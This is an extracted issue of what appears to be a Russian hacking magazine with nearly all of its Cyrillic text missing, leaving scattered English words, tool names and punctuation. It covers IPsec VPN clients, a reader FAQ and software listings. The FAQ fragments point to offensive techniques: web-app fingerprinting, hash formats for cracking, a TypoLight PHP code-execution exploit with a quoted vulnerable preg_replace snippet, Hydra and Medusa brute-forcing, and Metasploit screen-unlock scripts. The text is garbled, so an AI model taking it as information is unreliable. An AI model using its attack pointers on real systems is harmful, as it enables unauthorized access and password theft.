DYNDNS IP
IPsec-tools (ipsec-tools.sf.net).
IPsec , ,
NAT .
NAT-Traversal (NAT-T), ESP UDP (ESPinUDP)
4500/UDP.
NAT-Traversal,
IPsec.
, , .
DD-WRT (dd-wrt.com),
FreeWRT (freewrt.org), OpenWRT (openwrt.org), Midge (midge.vlad.org.ua) .
Linux ESPinUDP,
NAT-Traversal ipsec.conf:
nat_traversal=yes
, IPsec,
Linux, : strongSwan (strongswan.org) Openswan
(www.openswan.org).
Windows NAT-T
2000/SP3 XP/SP2. -
IPSEC? Windows,
2000,
IPsec,
, .
.
TheGreenBow VPN Client (thegreenbow.com/vpn.html),
,
-.
D-Link VPN Client IPsec ( 3DES/AES
NAT-T) VPN , D-Link.
, , , ,
KVpnc ( IPsec, IPsec/L2TP, PPTP,
OpenVPN, Cisco, Vtun SSH).
Shrew
Soft VPN Client (shrew.net),
Windows ( 2k Se7en), FreeBSD,
NetBSD, Linux. , IPsec-tools,
OpenSWAN, FreeSWAN, StrongSWAN Isakmpd.
, VPN-
.
. ,
. z
UNITS
lozovsky@gameland.ru
PSYCHO:
:
-
, .
, 1500 . , , . ? !
. ,
? . - , ,
. , - ,
,
, ,
-
.
, , :
.
, , .
, :). ,
.
, - :
(, , ),
?
,
, ?
,
?
? ,
, (,
, .
).
, ,
, . ? ,
,
-. ( )
, . : , .
, :
,
.
,
. .
.
( , -
?). .
, $50
:).
,
,
.
,
Delphi 4 Pascal.
-
. , ,
- ,
,
,
.
,
, ,
,
, .
, , ,
, ,
, ,
:).
(,
), (
, ,
, ,
,
, , ,
) ,
-
.
,
.
.
. ,
,
. ,
.
, ,
. :
1. , .
,
,
, , . .
2.
. ,
?
3.
(
)
,
, .
, ,
,
, .
.
(
,
), (, ,
).
,
, (
,
,
,
..) ,
:
,
,
, ,
, . , ,
. ,
.
, :
,
, , . ,
, ,
? ? ,
.
:
4.
, .
(, ).
.
.
, , - -
. , , ,
.
. MadDoc:
. , ,
-
-, , ,
, , . , ,
-
, ,
.
? ! ,
- . ?
, , , .
.
,
?
,
,
, : I
want you!. ,
, .
,
.
, /
-. .
. , ,
(, -
- ,
), ,
.
1. ,
. ,
-
(),
.
2.
; , .
3. .
, ( )
. ,
,
;). ,
, :
, , , .
, , .
, ,
/, , .
.
.
, , .
(
,
, )
( , ,
..), ,
,
, . , -
: ,
,
. , , ,
, , , , ,
, , ,
:).
, . ,
, , , .
,
:).
, ,
,
.
( ). , , ,
.
, 430 plain texta :).
, .
, 7%
. 38%
, 55% . ,
.
.
, ,
(, ),
. ,
. ,
, ,
, , , , , . ,
,
:), .
. ,
,
. !
][ , .
torrents.ru/rutracker.org !
!
, , . ,
, . , ,
, , , , - , ,
, .
. , , ,
, .
. , ,
,
, , , , ,
, 500
. , , 25
:).
,
,
, , , , . , :
- ,
, , , (-, ).
, .
. , .
, -
,
- :).
, :
, , . -
.
1. .
,
,
,
. ,
. , , ,
. .
.
,
. . , .
,
,
(
)
. :
(, -,
, -
?),
. ,
. ,
, , .
:
, ,
, .
, .
.
.
,
. , ,
,
.
.
, ,
. ,
, . . ,
,
, ,
.
, ,
.
2. .
, , :
, . ? ,
-
,
,
:).
, ,
, ,
. ( ,
), ,
(,
,
. ?),
,
. ? , . :
, ?
: -,
, , , , ,
!. ?
, ?
:
.
, , ,
.
,
.
. ,
,
.
!
, (,
), ,
, , ,
,
, .
,
. ,
,
,
:
. , ,
.
, .
,
:).
. ,
. ,
, -,
, .
][: , -
-?
..: . , . ,
, .
. ,
. : , , .
, . - :
, .
. , ,
. - .
. ,
- . , ,
, .
][: ! . - -, , . , - ?
.. , , .
: , .
. , ,
, .
: , . , ,
.
, , , .
, ,
. , ,
. ,
. , - .
, ,
, , ,
, , .
. ,
, , , , , .
, , , ,
,
100%
,
. , :). z
UNITS
Step twitter.com/stepah
faq
united
@real.xakep.ru
Q:
). ?
CMS -
A: vB
(fingerprinting)?
A:
Ruby
SQLite3 DB wafp (Web Application Finger Printer).
:
1. -
, - CMS (,
javascript-, );
2. md5-
;
3. CMS.
phpMyAdmin (
/themes/darkblue_orange/img/b_info.png
):
phpmyadmin-2.11.8
:
1. ;
2.
;
3.
.
phpmyadmin-2.11.4
Q: ,
CMS?
www.mytty.org/wafp.
(
),
http://sucuri.net/?page=docs&title=webappversion-detection.
CMS, (
)
WordPress . ,
Joomla Vulnerability Scanner
OWASP (www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project) CMS
Drupal Raz0r' (raz0r.name/drupalscan/).
Q: , vBulletin
A: , , itdefence.ru/dbitems.
: .
,
PasswordsPro (www.insidepro.com/eng/passwordspro.shtml).
,
forum.insidepro.com.
Q: php-?
A: php-
( error_reporting
E_ALL) echo/print
( http://phpfaq.ru/debug).
!
Expert Debugger (phpexperteditor.com),
CMS
PUNBB 1.2.X
QUICKSILVER FORUM
REFBASE (WEB REFERENCE DATABASE)
RUNCMS
SCRIPTEEN FREE IMAGE HOSTING SCRIPT
SHINOBU
SILVERSTRIPE
SLAED CMS
SMF 1.1.X
SMALLNUKE 2
SNEWS
SNITZ FORUMS 2000
TANGOCMS
TIKI WIKI
TINYPUG
TRIBIQ
TRITON CMS
USEBB
VANILLA
VBULLETIN 2.16
VBULLETIN 3.54
VIKINGBOARD
VOODOO CHAT
W-AGORA
WEBSITE BAKER
WORDPRESS <=2.3.3
WORDPRESS >=2.5
MD5($PASS) SHA-1
PHP Expert Editor.
DBG PHP Debugger,
IDE
.
:
PHP
;
breakpoints;
;
;
UTF-8;
profile;
IDE;
;
www.ankord.com.
Q:
ICQ-?
A: ICQ
Monitor (http://avtuh.ru/2009/11/27/icq-monitor.html),
ICQ- (//).
(
)
. ,
QIP
:)
Q: FAQ
CMS .
?
SHA1($USERNAME.$PASS)
MD5($PASS)
SHA-256
MD5($PASS)
"\\1")',
);
$strArticle = preg_replace($arrSearch, $arrReplace, $strArticle);
,
. ,
,
http://snipper.ru/view/6/typolight-270-php-code-executionexploit.
Q: ,
MD5(MD5($PASS).$SALT)
MD5($PASS)
MD5($PHPBB3)
-
?
A: ( http- ),
-
http://exploit.in/tools/anonym.php.
:
IP;
User agent ;
Hostname;
;
JavaScript: ;
( JavaScript);
-;
;
;
;
;
( IE).
JavaScript.
js
,
OS. ,
Google Analytics Piwik (www.piwik.org).
Q: 3-
./system/libraries/Controller.php
protected function printArticleAsPdf(Database_Result $objArticle)
{
$strArticle = preg_replace('/\?pdf=[0-9]*/i', '', $strArticle);
$arrSearch = array
(
'@(<pre.*</pre>)@Use',
);
$arrReplace = array
(
'str_replace("\n", "<br />",
.
.
A:
http://3character.com, 3- ,
.
(, , ,
):
Moniker.com;
SEX.com, $12.000.000, 1/25/2006,
Private Transaction.
, ,
:)
Q: .
,
,
.
: AFP, CVS, FTP, HTTP,
IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP,
PcAnywhere, POP3, PostgreSQL, rexec, rlogin,
rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2,
SVN, Telnet, VmAuthd, VNC.
,
. ,
,
, , ,
.
Q: -
(
LLLL, CCCC .. ?
Q: , DEP -
, ).
A: -
, ,
. .
, :
L - ;
N - ;
S - ;
C - ;
V - .
:
1. - (A, E, I, C, S, P, M, D, T);
2. (A, B, C, D, E, F, G, H, I, L, M, N, O, P,
R, S, T);
3. (J, K, U, V, W);
4. (Q, X, Y, Z).
A: DEP, , -
HTML-
Q: ,
Jimm.
?
A:
www.icq.com/password , ,
(
:).
, :
1. forum.asechka.ru
ICQ Password Recalling (IPR) karas3d;
2.
Jimm IP 127.0.0.1 ;
3. .
UIN
.
:
1. http://forum.motofan.ru/index.php?showtopic=147890 Jimm
ICQ Password Recovery;
2. , Open .rms Jimm;
3. Scan ,
.
.rms ,
motofan.ru
.
Q: THC-Hydra, , ,
( , ).
, -
Q: , ?
A: ,
,
.
lsass.exe , .
Metasploit'
(relentless-coding.blogspot.com/2010/02/windows-vista-7-targets-for-screen.html).
scripts/meterpreter Metasploit'. , ,
, ,
.
Q:
?
A: , .
:
?
A: Medusa (www.foofus.net/jmk/medusa/medusa.html), 2.0.
-
,
dsquery ,
A: Ruby
iScanner (iscanner.isecur1ty.org).
iframe',
javascript, vbscript activex.
Q: , ,
(][
Userlevel! .
), ,
BSOD.
?
A: , -
,
TDSS ( Tidserv, TDL3
Alureon). . ,
(, ,
Vista, Windows 7). TDSS cleaning tool (www.norman.com/support/support_tools/77201/en).
Q: Linux'
,
Bluetooth, (
) ?
A: PAM (Pluggable
Authentication Modules),
API-
. : ,
Bluetooth (
),
pam_blue (packages.gentoo.org/package/sys-auth/pam_blue).
:
pam_usb (pamusb.org)
USB-;
pam_fprint (reactivated.net/fprint/wiki/Pam_fprint) ;
pam-face-authentication (code.google.com/p/pam-face-authentication) -.
,
. z
>Net
Ad Muncher 4.81
Angry IP Scanner 3.0 Beta 4
ApexDC++ 1.3.0
CrossLoop 2.71
DNSBench
Halite 0.3.2.2
>Multimedia
Bullzip PDF Printer 7.1
Hornil StylePix 1.3.0
IOGraph 0.9
MediaInfo 0.7.28
Nuance PDF Reader 6
Picasa for Windows 3.6.0
ProgDVB v6.32.7
Screensaver Player 3.0
Sqirlz Morph 2.1
STDU Viewer 1.5.382
UVScreenCamera v4.4 beta
VSO Image Resizer 3.0
webcamXP 5 5.5
>Misc
Acer Gridvista 2.72.317
AM-DeadLink 4.0
BossMode 1.0
EverNote 3.5.2
File Association Fixer 1.0
Flexcrypt 3.3.0
Freeraser
LockHunter 1.0 Beta 3
Microsoft Keyboard Layout Creator 1.4
Mozilla Prism for Windows 1.0 Beta 3
MyEventViewer 1.25
MyPhoneExplorer 1.7.5
PeaZip 3.0
Polyglot 3000 3.44
Prio - Priority Saver 1.99
ProcessQuickLink
QTTabBar 1.2.3b5
RegScanner 1.80
TranslateIt! 8.0
WinDirStat 1.1.2
Windows Access Panel for Windows
7 & Vista
>>WINDOWS
>>Development
CollabNet Subversion 1.6.9
Database .NET 3.1.3712
Dependency Walker 2.2
EmEditor Professional 9.15
HiAsm 4.3
IncrediBuild 3.50
PatchFactory 3.3
Selenium 1.0.5
SQLiteStudio 1.1.3
SQLyog Community Edition 8.22
Syser Kernel Debugger 1.99.1900
Titanium Developer
VisualSVN 1.7.7
VisualSVN Server 2.1.1
WinHex 15.6
wyBuild 2.5
>>UNIX
>Desktop
Amarok 2.2.2
Anki 0.9.9.8.6
BashStyle-NG 7.9.1
BRL-CAD 7.16.4
Darktable 0.4
DeaDBeeF 0.3.2
DeVeDe 3.15.2
DjVuSmooth 0.2.2
Double Commander 0.4.5
Epidermis 0.5
gCAD3D 1.42
GRAMPS 3.1.3
Midnight Commander 4.7.0.2
NtEd 1.9.16
>System
Allmyapps
AnVir Task Manager
Bonkey for Windows
CPU-Z 1.53.5 Beta
Default Programs Editor 2.6
Defraggler 1.17
Driver Sweeper 2.1.0
DriverMax 5.5
Gizmo Central 2.7.7
HDDScan 3.2
Index Your Files 5.0
Ketarin 1.1.0
MONyog MySQL Monitor and Advisor
3.7.2
MySQL Community Server 5.1.44
Outpost Firewall Pro 2009
Panda Cloud Antivirus Free Edition
1.0.1
PostgreSQL 8.4.2
Quicksys RegDefrag 2.8
SIW 2010 (build 0210)
SUMo 2.7.5.86
>Security
BSQLHackerSetup 0909
DECAF 2.01
Heyoka 0.1.3
Imposter 0.9
John the Ripper 1.7.5
keimpx 0.2
LookInMyPC 2.0
Nessus 4.2.1
PenTBox 1.3.1
Sahi V3
Watcher 1.3.0
WebRaider 0.2.3.8
Websecurify 0.5RC1
WinFail2ban 0.1
MailBrowser 1.76
Opera 10.50
Seesmic for Windows 0.6
Skype 4.2
uTorrent 2.0
VisualRoute 2010 for Windows 14.0b
Wi-Fi Inspector 1.0.1
Wireshark for Windows 1.3.3
>Security
Browser Fuzzer 3
Burp Suite 1.3
FingerPrintFucker
GreenSQL 1.2.2
Groundspeed 1.1
Honeyd 1.5c
>Net
BitchX 1.1
Bitflu 0.97
EZ Intranet Messenger 1.2.4
FileZilla Client 3.3.2
gnetworktester 0.11
gWakeOnLan 0.5
I2P 0.7.11
Ipaudit 0.95
Midori 0.2.3
Mozilla Firefox 3.0.18
Nagstamon 0.9.2
Opera 10.10
Pidgin 2.6.6
Pino 0.2.0
SABnzbd 0.5.0
SeaMonkey 2.0.3
Sylpheed 3.0
Synchrorep 1.4.1
ZNC 0.080
>Games
Freeciv 2.2.0
>Devel
Ald 0.1.7
Autoconf Macro Archive
Code Browser 3.16
CodeInvestigator 0.22.1
crpcut 1.0.2
DreamPie 1.0
FireQuery 0.6
Git 1.7.0
itools 0.60.8
MoSync 2.3
Opera Dragonfly Alpha
Oracle Enterprise Pack for Eclipse
11g 11.1.1.4
ParseIRC 1.16
Picket 0.2.1
Rhodes 1.4
Seed7
Simple Sockets 1.4.0
SVN Access Manager 0.4.1.6
Trad4 3.1
UMLet 10.4
OpenOffice.org 3.2
OpenShot 1.0
QGIS 1.4
QPxtool 0.7.0
Rakarrack 0.4.2
Scilab 5.2.1
Sweet Home 3D 2.2
Thunar 1.1.0
Tomboy 1.0.1
zNotes 0.4.0
>X-distr
PC-BSD 8.0
>System
2click Update 5.0
AMD Catalyst 10.2
Deja Dup 13.91
Dstat 0.7.1
Gujin 2.8
Linux kernel 2.6.33
LTSP 5.2
Monit 5.1.1
nVidia 190.53
QEMU 0.12.3
Sudo 1.7.2p3
Syslinux 3.85
uBackup 4.95
Util-linux 2.17.1
VirtualBox 3.1.4
Wine 1.1.39
>Server
Apache 2.2.14
Asterisk 1.6.2
BIND 9.7.0
Cherokee 0.99.43
Clapf 0.4.4
CUPS 1.4.2
DHCP 4.1.1
HylaFax 5.4.1
IMSpector 0.9
KDE Personal WebServer 0.1
MoSSHe 10.2.22
MySQL 5.1.44
OpenLDAP 2.4.21
OpenSSH 5.3
OpenVPN 2.1.1
Postfix 2.7.0
ProFTPD 1.3.3
Samba 3.4.6
Sendmail 8.14.4
Squid 3.0.STABLE24
Httptunnel 3.0.5
iScanner 0.1
John the Ripper 1.7.5
Medusa 2.0
Netsniff-ng 0.5.4.2
Nikto 2.1.1
OpenDNSSEC 1.0.0
Portsentry 1.2
Privoxy 3.0.16
Snort 2.8.5.3
SquidClamAv 5.1
Suricata 0.8.1
UnHash 1.1
Zebedee 2.4.1
UNITS
HTTP:// WWW2
torrent-
TORRENT2EXE
www.torrent2exe.com
, ? ,
, , ,
. , , BitTorrent-,
, ?
,
www.torrent2exe.com .torrent-,
. ,
BitTorrent-.
PASTIE
www.pastie.org
- , - ,
XML-, ,
, Pastie . , -
(, C++ Python). , ,
.
,
.
- .
-
Python
UTILITY MILL
www.utilitymill.com
IZZYMENU
-? , -
. , Utility Mill, . , Python,
,
. , ,
.
, .
API .
, , - CSS
. IzzyMenu
,
, -
, ,
. IzzyMenu :
][ .
www.izzymenu.com